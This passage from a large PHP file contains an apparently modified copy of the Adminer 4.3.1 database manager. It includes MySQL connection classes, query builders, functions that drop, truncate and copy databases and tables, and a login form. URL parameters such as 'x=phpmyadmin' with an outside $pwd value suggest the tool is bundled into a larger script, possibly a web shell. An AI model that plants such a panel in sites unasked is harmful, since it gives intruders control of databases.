  6631. $H=$b->selectQueryBuild($M,$Z,$ad,$af,$z,$E);
  6632. if(!$H)
  6633. $H="SELECT".limit(($_GET["page"]!="last"&&+$z&&$ad&&$Cd&&$x=="sql"?"SQL_CALC_FOUND_ROWS ":"").implode(",",$M)."\nFROM ".table($R),($Z?"\nWHERE ".implode(" AND ",$Z):"").($ad&&$Cd?"\nGROUP BY ".implode(",",$ad):"").($af?"\nORDER BY ".implode(",",$af):""),($z!=""?+$z:null),($E?$z*$E:0), "\n");
  6634. $Sg=microtime(true);
  6635. $J=$this->_conn->query($H);
  6636. if($Jf)
  6637. echo $b->selectQuery($H, format_time($Sg));
  6638. return $J;
  6639. }
  6640. function delete($R,$Sf,$z=0) {
  6641. $H="FROM ".table($R);
  6642. return queries("DELETE".($z?limit1($H,$Sf):" $H$Sf"));
  6643. }
  6644. function update($R,$O,$Sf,$z=0,$Ag="\n") {
  6645. $gi=array();
  6646. foreach($O as $y=>$X)
  6647. $gi[]="$y = $X";
  6648. $H=table($R)." SET$Ag".implode(",$Ag",$gi);
  6649. return queries("UPDATE".($z?limit1($H,$Sf):" $H$Sf"));
  6650. }
  6651. function insert($R,$O) {
  6652. return queries("INSERT INTO ".table($R).($O?" (".implode(",",array_keys($O)).")\nVALUES (".implode(",",$O).")":" DEFAULT VALUES"));
  6653. }
  6654. function insertUpdate($R,$L,$Hf) {
  6655. return false;
  6656. }
  6657. function begin() {
  6658. return queries("BEGIN");
  6659. }
  6660. function commit() {
  6661. return queries("COMMIT");
  6662. }
  6663. function rollback() {
  6664. return queries("ROLLBACK");
  6665. }
  6666. }
  6667.  
  6668.  
  6669.  
  6670.  
  6671.  
  6672.  
  6673.  
  6674.  
  6675.  
  6676.  
  6677. $Wb=array("server"=>"MySQL")+$Wb;
  6678.  
  6679. if(!defined("DRIVER")) {
  6680. $Ef=array("MySQLi","MySQL","PDO_MySQL");
  6681.  
  6682. define("DRIVER","server");
  6683.  
  6684. if(extension_loaded("mysqli")) {
  6685. class Min_DB extends MySQLi {
  6686. var $extension="MySQLi";
  6687. function __construct() {
  6688. parent::init();
  6689. }
  6690.  
  6691. function connect($N="",$V="",$G="",$k=null,$Af=null,$Lg=null) {
  6692. mysqli_report(MYSQLI_REPORT_OFF);
  6693. list($kd,$Af)=explode(":",$N, 2);
  6694. $J=@$this->real_connect(($N!=""?$kd:ini_get("mysqli.default_host")),($N.$V!=""?$V:ini_get("mysqli.default_user")),($N.$V.$G!=""?$G:ini_get("mysqli.default_pw")),$k, (is_numeric($Af)?$Af:ini_get("mysqli.default_port")),(!is_numeric($Af)?$Af:$Lg));
  6695. return $J;
  6696. }
  6697.  
  6698. function set_charset($Za) {
  6699. if(parent::set_charset($Za))
  6700. return true;
  6701. parent::set_charset('utf8');
  6702. return $this->query("SET NAMES $Za");
  6703. }
  6704.  
  6705. function result($H,$o=0) {
  6706. $I=$this->query($H);
  6707. if(!$I)
  6708. return false;
  6709. $K=$I->fetch_array();
  6710. return $K[$o];
  6711. }
  6712.  
  6713. function quote($Q) {
  6714. return "'".$this->escape_string($Q)."'";
  6715. }
  6716. }
  6717. }elseif(extension_loaded("mysql")&&!(ini_get("sql.safe_mode")&&extension_loaded("pdo_mysql"))) {
  6718.  
  6719. class Min_DB {
  6720. var $extension="MySQL",$server_info,$affected_rows,$errno,$error,$_link,$_result;
  6721.  
  6722. function connect($N,$V,$G) {
  6723. $this->_link=@mysql_connect(($N!=""?$N:ini_get("mysql.default_host")),("$N$V"!=""?$V:ini_get("mysql.default_user")),("$N$V$G"!=""?$G:ini_get("mysql.default_password")), true, 131072);
  6724. if($this->_link)
  6725. $this->server_info=mysql_get_server_info($this->_link);
  6726. else
  6727. $this->error=mysql_error();
  6728. return (bool) $this->_link;
  6729. }
  6730.  
  6731. function set_charset($Za) {
  6732. if(function_exists('mysql_set_charset')) {
  6733. if(mysql_set_charset($Za,$this->_link))
  6734. return true;
  6735. mysql_set_charset('utf8',$this->_link);
  6736. }
  6737. return $this->query("SET NAMES $Za");
  6738. }
  6739.  
  6740. function quote($Q) {
  6741. return "'".mysql_real_escape_string($Q,$this->_link)."'";
  6742. }
  6743.  
  6744. function select_db($k) {
  6745. return mysql_select_db($k,$this->_link);
  6746. }
  6747.  
  6748. function query($H,$Ph=false) {
  6749. $I=@($Ph?mysql_unbuffered_query($H,$this->_link):mysql_query($H,$this->_link));
  6750. $this->error="";
  6751. if(!$I) {
  6752. $this->errno=mysql_errno($this->_link);
  6753. $this->error=mysql_error($this->_link);
  6754. return false;
  6755. }
  6756. if($I===true) {
  6757. $this->affected_rows=mysql_affected_rows($this->_link);
  6758. $this->info=mysql_info($this->_link);
  6759. return true;
  6760. }
  6761. return new Min_Result($I);
  6762. }
  6763.  
  6764. function multi_query($H) {
  6765. return $this->_result=$this->query($H);
  6766. }
  6767.  
  6768. function store_result() {
  6769. return $this->_result;
  6770. }
  6771.  
  6772. function next_result() {
  6773. return false;
  6774. }
  6775.  
  6776. function result($H,$o=0) {
  6777. $I=$this->query($H);
  6778. if(!$I||!$I->num_rows)
  6779. return false;
  6780. return mysql_result($I->_result, 0,$o);
  6781. }
  6782.  
  6783. }
  6784.  
  6785. class Min_Result {
  6786. var $num_rows,$_result,$_offset=0;
  6787. function __construct($I) {
  6788. $this->_result=$I;
  6789. $this->num_rows=mysql_num_rows($I);
  6790. }
  6791. function fetch_assoc() {
  6792. return mysql_fetch_assoc($this->_result);
  6793. }
  6794. function fetch_row() {
  6795. return mysql_fetch_row($this->_result);
  6796. }
  6797. function fetch_field() {
  6798. $J=mysql_fetch_field($this->_result,$this->_offset++);
  6799. $J->orgtable=$J->table;
  6800. $J->orgname=$J->name;
  6801. $J->charsetnr=($J->blob?63:0);
  6802. return $J;
  6803. }
  6804. function __destruct() {
  6805. mysql_free_result($this->_result);
  6806. }
  6807. }
  6808. }elseif(extension_loaded("pdo_mysql")) {
  6809. class Min_DB extends Min_PDO {
  6810. var $extension="PDO_MySQL";
  6811. function connect($N,$V,$G) {
  6812. $this->dsn("mysql:charset=utf8;host=".str_replace(":",";unix_socket=",preg_replace('~:(\\d)~',';port=\\1',$N)),$V,$G);
  6813. return true;
  6814. }
  6815. function set_charset($Za) {
  6816. $this->query("SET NAMES $Za");
  6817. }
  6818. function select_db($k) {
  6819. return $this->query("USE ".idf_escape($k));
  6820. }
  6821. function query($H,$Ph=false) {
  6822. $this->setAttribute(1000, !$Ph);
  6823. return parent::query($H,$Ph);
  6824. }
  6825. }
  6826. }
  6827.  
  6828.  
  6829. class Min_Driver extends Min_SQL {
  6830. function insert($R,$O) {
  6831. return ($O?parent::insert($R,$O):queries("INSERT INTO ".table($R)." ()\nVALUES ()"));
  6832. }
  6833.  
  6834. function insertUpdate($R,$L,$Hf) {
  6835. $f=array_keys(reset($L));
  6836. $Ff="INSERT INTO ".table($R)." (".implode(",",$f).") VALUES\n";
  6837. $gi=array();
  6838. foreach($f as $y)
  6839. $gi[$y]="$y = VALUES($y)";
  6840. $Yg="\nON DUPLICATE KEY UPDATE ".implode(",",$gi);
  6841. $gi=array();
  6842. $Yd=0;
  6843. foreach($L as $O) {
  6844. $Y="(".implode(",",$O).")";
  6845. if($gi&&(strlen($Ff)+$Yd+strlen($Y)+strlen($Yg)>1e6)) {
  6846. if(!queries($Ff.implode(",\n",$gi).$Yg))
  6847. return false;
  6848. $gi=array();
  6849. $Yd=0;
  6850. }
  6851. $gi[]=$Y;
  6852. $Yd+=strlen($Y)+2;
  6853. }
  6854. return queries($Ff.implode(",\n",$gi).$Yg);
  6855. }
  6856.  
  6857. }
  6858.  
  6859.  
  6860. function idf_escape($u) {
  6861. return "`".str_replace("`","``",$u)."`";
  6862. }
  6863.  
  6864. function table($u) {
  6865. return idf_escape($u);
  6866. }
  6867.  
  6868. function connect() {
  6869. global $b,$Oh,$Vg;
  6870. $g=new Min_DB;
  6871. $j=$b->credentials();
  6872. if($g->connect($j[0],$j[1],$j[2])) {
  6873. $g->set_charset(charset($g));
  6874. $g->query("SET sql_quote_show_create = 1, autocommit = 1");
  6875. if(version_compare($g->server_info, '5.7.8')>=0) {
  6876. $Vg['Strings'][]="json";
  6877. $Oh["json"]=4294967295;
  6878. }
  6879. return $g;
  6880. }
  6881. $J=$g->error;
  6882. if(function_exists('iconv')&&!is_utf8($J)&&strlen($sg=iconv("windows-1250","utf-8",$J))>strlen($J))
  6883. $J=$sg;
  6884. return $J;
  6885. }
  6886.  
  6887. function get_databases($Oc) {
  6888. global $g;
  6889. $J=get_session("dbs");
  6890. if($J===null) {
  6891. $H=($g->server_info>=5?"SELECT SCHEMA_NAME FROM information_schema.SCHEMATA":"SHOW DATABASES");
  6892. $J=($Oc?slow_query($H):get_vals($H));
  6893. restart_session();
  6894. set_session("dbs",$J);
  6895. stop_session();
  6896. }
  6897. return $J;
  6898. }
  6899.  
  6900. function limit($H,$Z,$z,$D=0,$Ag=" ") {
  6901. return " $H$Z".($z!==null?$Ag."LIMIT $z".($D?" OFFSET $D":""):"");
  6902. }
  6903.  
  6904. function limit1($H,$Z) {
  6905. return limit($H,$Z, 1);
  6906. }
  6907.  
  6908. function db_collation($m,$mb) {
  6909. global $g;
  6910. $J=null;
  6911. $i=$g->result("SHOW CREATE DATABASE ".idf_escape($m), 1);
  6912. if(preg_match('~ COLLATE ([^ ]+)~',$i,$B))
  6913. $J=$B[1];
  6914. elseif(preg_match('~ CHARACTER SET ([^ ]+)~',$i,$B))
  6915. $J=$mb[$B[1]][-1];
  6916. return $J;
  6917. }
  6918.  
  6919. function engines() {
  6920. $J=array();
  6921. foreach(get_rows("SHOW ENGINES") as $K) {
  6922. if(preg_match("~YES|DEFAULT~",$K["Support"]))
  6923. $J[]=$K["Engine"];
  6924. }
  6925. return $J;
  6926. }
  6927.  
  6928. function logged_user() {
  6929. global $g;
  6930. return $g->result("SELECT USER()");
  6931. }
  6932.  
  6933. function tables_list() {
  6934. global $g;
  6935. return get_key_vals($g->server_info>=5?"SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() ORDER BY TABLE_NAME":"SHOW TABLES");
  6936. }
  6937.  
  6938. function count_tables($l) {
  6939. $J=array();
  6940. foreach($l as $m)
  6941. $J[$m]=count(get_vals("SHOW TABLES IN ".idf_escape($m)));
  6942. return $J;
  6943. }
  6944.  
  6945. function table_status($C="",$Dc=false) {
  6946. global $g;
  6947. $J=array();
  6948. foreach(get_rows($Dc&&$g->server_info>=5?"SELECT TABLE_NAME AS Name, ENGINE AS Engine, TABLE_COMMENT AS Comment FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() ".($C!=""?"AND TABLE_NAME = ".q($C):"ORDER BY Name"):"SHOW TABLE STATUS".($C!=""?" LIKE ".q(addcslashes($C, "%_\\")):"")) as $K) {
  6949. if($K["Engine"]=="InnoDB")
  6950. $K["Comment"]=preg_replace('~(?:(.+); )?InnoDB free: .*~','\\1',$K["Comment"]);
  6951. if(!isset($K["Engine"]))
  6952. $K["Comment"]="";
  6953. if($C!="")
  6954. return $K;
  6955. $J[$K["Name"]]=$K;
  6956. }
  6957. return $J;
  6958. }
  6959.  
  6960. function is_view($S) {
  6961. return $S["Engine"]===null;
  6962. }
  6963.  
  6964. function fk_support($S) {
  6965. global $g;
  6966. return preg_match('~InnoDB|IBMDB2I~i',$S["Engine"])||(preg_match('~NDB~i',$S["Engine"])&&version_compare($g->server_info, '5.6')>=0);
  6967. }
  6968.  
  6969. function fields($R) {
  6970. $J=array();
  6971. foreach(get_rows("SHOW FULL COLUMNS FROM ".table($R)) as $K) {
  6972. preg_match('~^([^( ]+)(?:\\((.+)\\))?( unsigned)?( zerofill)?$~',$K["Type"],$B);
  6973. $J[$K["Field"]]=array("field"=>$K["Field"],"full_type"=>$K["Type"],"type"=>$B[1],"length"=>$B[2],"unsigned"=>ltrim($B[3].$B[4]),"default"=>($K["Default"]!=""||preg_match("~char|set~",$B[1])?$K["Default"]:null),"null"=>($K["Null"]=="YES"),"auto_increment"=>($K["Extra"]=="auto_increment"),"on_update"=>(preg_match('~^on update (.+)~i',$K["Extra"],$B)?$B[1]:""),"collation"=>$K["Collation"],"privileges"=>array_flip(preg_split('~, *~',$K["Privileges"])),"comment"=>$K["Comment"],"primary"=>($K["Key"]=="PRI"));
  6974. }
  6975. return $J;
  6976. }
  6977.  
  6978. function indexes($R,$h=null) {
  6979. $J=array();
  6980. foreach(get_rows("SHOW INDEX FROM ".table($R),$h) as $K) {
  6981. $C=$K["Key_name"];
  6982. $J[$C]["type"]=($C=="PRIMARY"?"PRIMARY":($K["Index_type"]=="FULLTEXT"?"FULLTEXT":($K["Non_unique"]?($K["Index_type"]=="SPATIAL"?"SPATIAL":"INDEX"):"UNIQUE")));
  6983. $J[$C]["columns"][]=$K["Column_name"];
  6984. $J[$C]["lengths"][]=($K["Index_type"]=="SPATIAL"?null:$K["Sub_part"]);
  6985. $J[$C]["descs"][]=null;
  6986. }
  6987. return $J;
  6988. }
  6989.  
  6990. function foreign_keys($R) {
  6991. global $g,$Qe;
  6992. static $yf='`(?:[^`]|``)+`';
  6993. $J=array();
  6994. $Ab=$g->result("SHOW CREATE TABLE ".table($R), 1);
  6995. if($Ab) {
  6996. preg_match_all("~CONSTRAINT ($yf) FOREIGN KEY ?\\(((?:$yf,? ?)+)\\) REFERENCES ($yf)(?:\\.($yf))? \\(((?:$yf,? ?)+)\\)(?: ON DELETE ($Qe))?(?: ON UPDATE ($Qe))?~",$Ab,$he, PREG_SET_ORDER);
  6997. foreach($he as $B) {
  6998. preg_match_all("~$yf~",$B[2],$Ng);
  6999. preg_match_all("~$yf~",$B[5],$lh);
  7000. $J[idf_unescape($B[1])]=array("db"=>idf_unescape($B[4]!=""?$B[3]:$B[4]),"table"=>idf_unescape($B[4]!=""?$B[4]:$B[3]),"source"=>array_map('idf_unescape',$Ng[0]),"target"=>array_map('idf_unescape',$lh[0]),"on_delete"=>($B[6]?$B[6]:"RESTRICT"),"on_update"=>($B[7]?$B[7]:"RESTRICT"));
  7001. }
  7002. }
  7003. return $J;
  7004. }
  7005.  
  7006. function view($C) {
  7007. global $g;
  7008. return array("select"=>preg_replace('~^(?:[^`]|`[^`]*`)*\\s+AS\\s+~isU','',$g->result("SHOW CREATE VIEW ".table($C), 1)));
  7009. }
  7010.  
  7011. function collations() {
  7012. $J=array();
  7013. foreach(get_rows("SHOW COLLATION") as $K) {
  7014. if($K["Default"])
  7015. $J[$K["Charset"]][-1]=$K["Collation"];
  7016. else
  7017. $J[$K["Charset"]][]=$K["Collation"];
  7018. }
  7019. ksort($J);
  7020. foreach($J as $y=>$X)
  7021. asort($J[$y]);
  7022. return $J;
  7023. }
  7024.  
  7025. function information_schema($m) {
  7026. global $g;
  7027. return ($g->server_info>=5&&$m=="information_schema")||($g->server_info>=5.5&&$m=="performance_schema");
  7028. }
  7029. function error() {
  7030. global $g;
  7031. return h(preg_replace('~^You have an error.*syntax to use~U', "Syntax error",$g->error));
  7032. }
  7033. function create_database($m,$d) {
  7034. return queries("CREATE DATABASE ".idf_escape($m).($d?" COLLATE ".q($d):""));
  7035. }
  7036. function drop_databases($l) {
  7037. $J=apply_queries("DROP DATABASE",$l, 'idf_escape');
  7038. restart_session();
  7039. set_session("dbs",null);
  7040. return $J;
  7041. }
  7042. function rename_database($C,$d) {
  7043. $J=false;
  7044. if(create_database($C,$d)) {
  7045. $fg=array();
  7046. foreach(tables_list() as $R=>$U)
  7047. $fg[]=table($R)." TO ".idf_escape($C).".".table($R);
  7048. $J=(!$fg||queries("RENAME TABLE ".implode(",",$fg)));
  7049. if($J)
  7050. queries("DROP DATABASE ".idf_escape(DB));
  7051. restart_session();
  7052. set_session("dbs",null);
  7053. }
  7054. return $J;
  7055. }
  7056. function auto_increment() {
  7057. $La=" PRIMARY KEY";
  7058. if($_GET["create"]!=""&&$_POST["auto_increment_col"]) {
  7059. foreach(indexes($_GET["create"]) as $v) {
  7060. if(in_array($_POST["fields"][$_POST["auto_increment_col"]]["orig"],$v["columns"], true)) {
  7061. $La="";
  7062. break;
  7063. }
  7064. if($v["type"]=="PRIMARY")
  7065. $La=" UNIQUE";
  7066. }
  7067. }
  7068. return " AUTO_INCREMENT$La";
  7069. }
  7070. function alter_table($R,$C,$p,$Pc,$qb,$mc,$d,$Ka,$tf) {
  7071. $c=array();
  7072. foreach($p as $o)
  7073. $c[]=($o[1]?($R!=""?($o[0]!=""?"CHANGE ".idf_escape($o[0]):"ADD"):" ")." ".implode($o[1]).($R!=""?$o[2]:""):"DROP ".idf_escape($o[0]));
  7074. $c=array_merge($c,$Pc);
  7075. $P=($qb!==null?" COMMENT=".q($qb):"").($mc?" ENGINE=".q($mc):"").($d?" COLLATE ".q($d):"").($Ka!=""?" AUTO_INCREMENT=$Ka":"");
  7076. if($R=="")
  7077. return queries("CREATE TABLE ".table($C)." (\n".implode(",\n",$c)."\n)$P$tf");
  7078. if($R!=$C)
  7079. $c[]="RENAME TO ".table($C);
  7080. if($P)
  7081. $c[]=ltrim($P);
  7082. return ($c||$tf?queries("ALTER TABLE ".table($R)."\n".implode(",\n",$c).$tf):true);
  7083. }
  7084. function alter_indexes($R,$c) {
  7085. foreach($c as $y=>$X)
  7086. $c[$y]=($X[2]=="DROP"?"\nDROP INDEX ".idf_escape($X[1]):"\nADD $X[0] ".($X[0]=="PRIMARY"?"KEY ":"").($X[1]!=""?idf_escape($X[1])." ":"")."(".implode(",",$X[2]).")");
  7087. return queries("ALTER TABLE ".table($R).implode(",",$c));
  7088. }
  7089. function truncate_tables($T) {
  7090. return apply_queries("TRUNCATE TABLE",$T);
  7091. }
  7092. function drop_views($li) {
  7093. return queries("DROP VIEW ".implode(",",array_map('table',$li)));
  7094. }
  7095. function drop_tables($T) {
  7096. return queries("DROP TABLE ".implode(",",array_map('table',$T)));
  7097. }
  7098. function move_tables($T,$li,$lh) {
  7099. $fg=array();
  7100. foreach(array_merge($T,$li) as $R)
  7101. $fg[]=table($R)." TO ".idf_escape($lh).".".table($R);
  7102. return queries("RENAME TABLE ".implode(",",$fg));
  7103. }
  7104. function copy_tables($T,$li,$lh) {
  7105. queries("SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO'");
  7106. foreach($T as $R) {
  7107. $C=($lh==DB?table("copy_$R"):idf_escape($lh).".".table($R));
  7108. if(!queries("\nDROP TABLE IF EXISTS $C")||!queries("CREATE TABLE $C LIKE ".table($R))||!queries("INSERT INTO $C SELECT * FROM ".table($R)))
  7109. return false;
  7110. }
  7111. foreach($li as $R) {
  7112. $C=($lh==DB?table("copy_$R"):idf_escape($lh).".".table($R));
  7113. $ki=view($R);
  7114. if(!queries("DROP VIEW IF EXISTS $C")||!queries("CREATE VIEW $C AS $ki[select]"))
  7115. return false;
  7116. }
  7117. return true;
  7118. }
  7119. function trigger($C) {
  7120. if($C=="")
  7121. return array();
  7122. $L=get_rows("SHOW TRIGGERS WHERE `Trigger` = ".q($C));
  7123. return reset($L);
  7124. }
  7125. function triggers($R) {
  7126. $J=array();
  7127. foreach(get_rows("SHOW TRIGGERS LIKE ".q(addcslashes($R, "%_\\"))) as $K)
  7128. $J[$K["Trigger"]]=array($K["Timing"],$K["Event"]);
  7129. return $J;
  7130. }
  7131.  
  7132. function trigger_options() {
  7133. return array("Timing"=>array("BEFORE","AFTER"),"Event"=>array("INSERT","UPDATE","DELETE"),"Type"=>array("FOR EACH ROW"));
  7134. }
  7135.  
  7136.  
  7137. function routine($C,$U) {
  7138. global $g,$oc,$wd,$Oh;
  7139. $Ba=array("bool","boolean","integer","double precision","real","dec","numeric","fixed","national char","national varchar");
  7140. $Nh="((".implode("|",array_merge(array_keys($Oh),$Ba)).")\\b(?:\\s*\\(((?:[^'\")]|$oc)++)\\))?\\s*(zerofill\\s*)?(unsigned(?:\\s+zerofill)?)?)(?:\\s*(?:CHARSET|CHARACTER\\s+SET)\\s*['\"]?([^'\"\\s,]+)['\"]?)?";
  7141. $yf="\\s*(".($U=="FUNCTION"?"":$wd).")?\\s*(?:`((?:[^`]|``)*)`\\s*|\\b(\\S+)\\s+)$Nh";
  7142. $i=$g->result("SHOW CREATE $U ".idf_escape($C), 2);
  7143. preg_match("~\\(((?:$yf\\s*,?)*)\\)\\s*".($U=="FUNCTION"?"RETURNS\\s+$Nh\\s+":"")."(.*)~is",$i,$B);
  7144. $p=array();
  7145. preg_match_all("~$yf\\s*,?~is",$B[1],$he, PREG_SET_ORDER);
  7146. foreach($he as $nf) {
  7147. $C=str_replace("``","`",$nf[2]).$nf[3];
  7148. $p[]=array("field"=>$C,"type"=>strtolower($nf[5]),"length"=>preg_replace_callback("~$oc~s",'normalize_enum',$nf[6]),"unsigned"=>strtolower(preg_replace('~\\s+~',' ', trim("$nf[8] $nf[7]"))),"null"=>1,"full_type"=>$nf[4],"inout"=>strtoupper($nf[1]),"collation"=>strtolower($nf[9]));
  7149. }
  7150. if($U!="FUNCTION")
  7151. return array("fields"=>$p,"definition"=>$B[11]);
  7152. return array("fields"=>$p,"returns"=>array("type"=>$B[12],"length"=>$B[13],"unsigned"=>$B[15],"collation"=>$B[16]),"definition"=>$B[17],"language"=>"SQL");
  7153. }
  7154.  
  7155.  
  7156. function routines() {
  7157. return get_rows("SELECT ROUTINE_NAME, ROUTINE_TYPE, DTD_IDENTIFIER FROM information_schema.ROUTINES WHERE ROUTINE_SCHEMA = ".q(DB));
  7158. }
  7159. function routine_languages() {
  7160. return array();
  7161. }
  7162. function last_id() {
  7163. global $g;
  7164. return $g->result("SELECT LAST_INSERT_ID()");
  7165. }
  7166. function explain($g,$H) {
  7167. return $g->query("EXPLAIN ".($g->server_info>=5.1?"PARTITIONS ":"").$H);
  7168. }
  7169. function found_rows($S,$Z) {
  7170. return ($Z||$S["Engine"]!="InnoDB"?null:$S["Rows"]);
  7171. }
  7172. function types() {
  7173. return array();
  7174. }
  7175. function schemas() {
  7176. return array();
  7177. }
  7178. function get_schema() {
  7179. return "";
  7180. }
  7181. function set_schema($ug) {
  7182. return true;
  7183. }
  7184. function create_sql($R,$Ka) {
  7185. global $g;
  7186. $J=$g->result("SHOW CREATE TABLE ".table($R), 1);
  7187. if(!$Ka)
  7188. $J=preg_replace('~ AUTO_INCREMENT=\\d+~','',$J);
  7189. return $J;
  7190. }
  7191. function truncate_sql($R) {
  7192. return "TRUNCATE ".table($R);
  7193. }
  7194. function use_sql($k) {
  7195. return "USE ".idf_escape($k);
  7196. }
  7197. function trigger_sql($R,$Wg) {
  7198. $J="";
  7199. foreach(get_rows("SHOW TRIGGERS LIKE ".q(addcslashes($R, "%_\\")), null, "-- ") as $K)
  7200. $J.="\n".($Wg=='CREATE+ALTER'?"DROP TRIGGER IF EXISTS ".idf_escape($K["Trigger"]).";;\n":"")."CREATE TRIGGER ".idf_escape($K["Trigger"])." $K[Timing] $K[Event] ON ".table($K["Table"])." FOR EACH ROW\n$K[Statement];;\n";
  7201. return $J;
  7202. }
  7203. function show_variables() {
  7204. return get_key_vals("SHOW VARIABLES");
  7205. }
  7206. function process_list() {
  7207. return get_rows("SHOW FULL PROCESSLIST");
  7208. }
  7209. function show_status() {
  7210. return get_key_vals("SHOW STATUS");
  7211. }
  7212. function replication_status($U) {
  7213. return get_rows("SHOW $U STATUS");
  7214. }
  7215. function convert_field($o) {
  7216. if(preg_match("~binary~",$o["type"]))
  7217. return "HEX(".idf_escape($o["field"]).")";
  7218. if($o["type"]=="bit")
  7219. return "BIN(".idf_escape($o["field"])." + 0)";
  7220. if(preg_match("~geometry|point|linestring|polygon~",$o["type"]))
  7221. return "AsWKT(".idf_escape($o["field"]).")";
  7222. }
  7223. function unconvert_field($o,$J) {
  7224. if(preg_match("~binary~",$o["type"]))
  7225. $J="UNHEX($J)";
  7226. if($o["type"]=="bit")
  7227. $J="CONV($J, 2, 10) + 0";
  7228. if(preg_match("~geometry|point|linestring|polygon~",$o["type"]))
  7229. $J="GeomFromText($J)";
  7230. return $J;
  7231. }
  7232. function support($Ec) {
  7233. global $g;
  7234. return !preg_match("~scheme|sequence|type|view_trigger|materializedview".($g->server_info<5.1?"|event|partitioning".($g->server_info<5?"|routine|trigger|view":""):"")."~",$Ec);
  7235. }
  7236. function kill_process($X) {
  7237. return queries("KILL ".number($X));
  7238. }
  7239. function connection_id() {
  7240. return "SELECT CONNECTION_ID()";
  7241. }
  7242.  
  7243.  
  7244. function max_connections() {
  7245. global $g;
  7246. return $g->result("SELECT @@max_connections");
  7247. }
  7248.  
  7249.  
  7250. $x="sql";
  7251. $Oh=array();
  7252. $Vg=array();
  7253. foreach(array('Numbers' => array("tinyint" => 3,"smallint" => 5,"mediumint" => 8,"int" => 10,"bigint" => 20,"decimal" => 66,"float" => 12,"double" => 21),'Date and time' => array("date" => 10,"datetime" => 19,"timestamp" => 19,"time" => 10,"year" => 4),'Strings' => array("char" => 255,"varchar" => 65535,"tinytext" => 255,"text" => 65535,"mediumtext" => 16777215,"longtext" => 4294967295),'Lists' => array("enum" => 65535,"set" => 64),'Binary' => array("bit" => 20,"binary" => 255,"varbinary" => 65535,"tinyblob" => 255,"blob" => 65535,"mediumblob" => 16777215,"longblob" => 4294967295),'Geometry' => array("geometry" => 0,"point" => 0,"linestring" => 0,"polygon" => 0,"multipoint" => 0,"multilinestring" => 0,"multipolygon" => 0,"geometrycollection" => 0)) as $y => $X){
  7254. $Oh += $X;
  7255. $Vg[$y]=array_keys($X);
  7256. }
  7257. $Vh=array("unsigned","zerofill","unsigned zerofill");
  7258. $Ve=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","REGEXP","IN","IS NULL","NOT LIKE","NOT REGEXP","NOT IN","IS NOT NULL","SQL");
  7259. $Xc=array("char_length","date","from_unixtime","lower","round","sec_to_time","time_to_sec","upper");
  7260. $cd=array("avg","count","count distinct","group_concat","max","min","sum");
  7261. $ec=array(array("char" => "md5/sha1/password/encrypt/uuid","binary" => "md5/sha1","date|time" => "now"),array("(^|[^o])int|float|double|decimal" => "+/-","date" => "+ interval/- interval","time" => "addtime/subtime","char|text" => "concat"));}
  7262.  
  7263.  
  7264.  
  7265. define("SERVER",$_GET[DRIVER]);
  7266. define("DB",$_GET["db"]);
  7267. define("ME",preg_replace('~^[^?]*/([^?]*).*~','\\1',$_SERVER["REQUEST_URI"]).'?'.(sid()?SID.'&':'').(SERVER!==null?DRIVER."=".urlencode(SERVER).'&':'').(isset($_GET["username"])?"dm=".$pwd."&x=phpmyadmin&username=".urlencode($_GET["username"]).'&':'').(DB!=""?'db='.urlencode(DB).'&'.(isset($_GET["ns"])?"ns=".urlencode($_GET["ns"])."&":""):''));
  7268. $ia="4.3.1";
  7269.  
  7270. class Adminer {
  7271. var $operators;
  7272. function name() {
  7273. return "<a href='https://www.adminer.org/' target='_blank' id='h1'>Adminer</a>";
  7274. }
  7275. function credentials() {
  7276. return array(SERVER,$_GET["username"],get_password());
  7277. }
  7278. function permanentLogin($i=false) {
  7279. return password_file($i);
  7280. }
  7281. function bruteForceKey() {
  7282. return $_SERVER["REMOTE_ADDR"];
  7283. }
  7284. function database() {
  7285. return DB;
  7286. }
  7287. function databases($Oc=true) {
  7288. return get_databases($Oc);
  7289. }
  7290. function schemas() {
  7291. return schemas();
  7292. }
  7293. function queryTimeout() {
  7294. return 5;
  7295. }
  7296. function headers() {
  7297. return true;
  7298. }
  7299. function head() {
  7300. return true;
  7301. }
  7302.  
  7303.  
  7304. function loginForm() {
  7305. global $Wb;
  7306. echo '<table id="menustable" cellspacing="0" border="1">
  7307. <tr><td>System<td>', html_select("auth[driver]",$Wb, DRIVER), '<tr>
  7308. <td>Server<td><input type="text" name="auth[server]" value="', h(SERVER), '" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
  7309. <tr><td>Username<td><input type="text" name="auth[username]" id="username" value="', h($_GET["username"]), '" autocapitalize="off">
  7310. <tr><td>Password<td><input type="text" name="auth[password]">
  7311. <tr><td>Database<td><input type="text" name="auth[db]" value="', h($_GET["db"]), '" autocapitalize="off">
  7312. </table>
  7313. <script type="text/javascript">focus(document.getElementById(\'username\'));</script>', "<p><input type='submit' value='".'Login'."'>\n",checkbox("auth[permanent]",1,$_COOKIE["adminer_permanent"], 'Permanent login')."\n";
  7314. }
  7315.  
  7316.  
  7317. function login($ce,$G) {
  7318. global $x;
  7319. if($x=="sqlite")
  7320. return sprintf('<a href="https://www.adminer.org/en/extension/" target="_blank">Implement</a> %s method to use SQLite.','<span class=cod>login()</span>');
  7321. return true;
  7322. }
  7323.  
  7324. function tableName($ch) {
  7325. return h($ch["Name"]);
  7326. }
  7327. function fieldName($o,$af=0) {
  7328. return '<span title="'.h($o["full_type"]).'">'.h($o["field"]).'</span>';
  7329. }
  7330. function selectLinks($ch,$O="") {
  7331. echo '<p class="links">';
  7332. $be=array("select"=>'Select data');
  7333. if(support("table")||support("indexes"))
  7334. $be["table"]='Show structure';
  7335. if(support("table")) {
  7336. if(is_view($ch))
  7337. $be["view"]='Alter view';
  7338. else
  7339. $be["create"]='Alter table';
  7340. }
  7341. if($O!==null)
  7342. $be["edit"]='New item';
  7343. foreach($be as $y=>$X)
  7344. echo " <a href='".h(ME)."$y=".urlencode($ch["Name"]).($y=="edit"?$O:"")."'".bold(isset($_GET[$y])).">$X</a>";
  7345. echo "\n";
  7346. }
  7347. function foreignKeys($R) {
  7348. return foreign_keys($R);
  7349. }
  7350. function backwardKeys($R,$bh) {
  7351. return array();
  7352. }
  7353. function backwardKeysPrint($Na,$K) {
  7354. }
  7355. function selectQuery($H,$sh) {
  7356. global $x;
